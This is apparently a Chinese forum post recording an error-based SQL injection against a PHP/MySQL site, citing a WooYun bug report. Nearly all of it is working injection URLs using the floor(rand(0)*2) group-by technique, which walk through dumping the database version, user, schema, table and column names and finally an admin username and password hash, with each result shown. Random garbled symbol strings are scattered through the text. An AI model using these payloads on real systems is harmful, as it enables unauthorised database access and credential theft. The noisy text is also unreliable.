php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666

之前想找个测试 没想到这有 可以测试下做个记录而已

! A9 |, e; @3 @8 K' ihttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

' Y1 `2 L5 L- l/data0/htdocs/leqi_new/app/myapp.php
9 }$ q$ |" N+ }4 E
; B" o9 ^' Y2 w1 S  M 或者

/**********version()**********/ 5.1.49-log
% l  c2 y9 a/ O; qhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% r+ H) b+ O1 R: r2 A
1 F4 J% L" [7 s8 J/**********user()**********/  
* \6 m4 }& w4 v# n% M# E. Ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 ]" s  A: [6 }3 ^
6 m2 ^; L$ q/ s$ j3 |9 f9 F9 A, d/**********database()**********/  leqi
5 c) ?! m. H& ^3 ihttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

) M; Z0 p( i3 l. K* K: n: d5 i/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
- Q7 b& o2 _6 S# i* [leqi
( u- a! w3 B& u- G& zhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
' e) C# h& [, K& x0 r  j3 Utest
  b" h) ?6 s8 ?
6 f% }: H: r) [! O5 y  s; H/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
3 m7 i4 ~$ Q) \# B. H7 c) e' `
1 {# [9 ^7 j/ _# B- ?/**********limit依次递归爆字段名**********/
! [, N1 l& \9 shttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. J- L2 Z$ r  M( f( U# W( ouser_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
% F' a, ?+ \+ k$ J/wapc/5000_0005_003
11 21
  I* ?) |& [) fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
8 n0 H6 c/ e$ }* F# c11 341 351 361
# t1 ?3 ]- ]. t# K7 @, P; P/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 ^6 x  S' ?9 E3 j! d6a8b4574ca231eb8bd52764d4978ffcd
0 l$ p! B8 v4 M' K$ P
* l6 b$ h! I7 i/ [5 o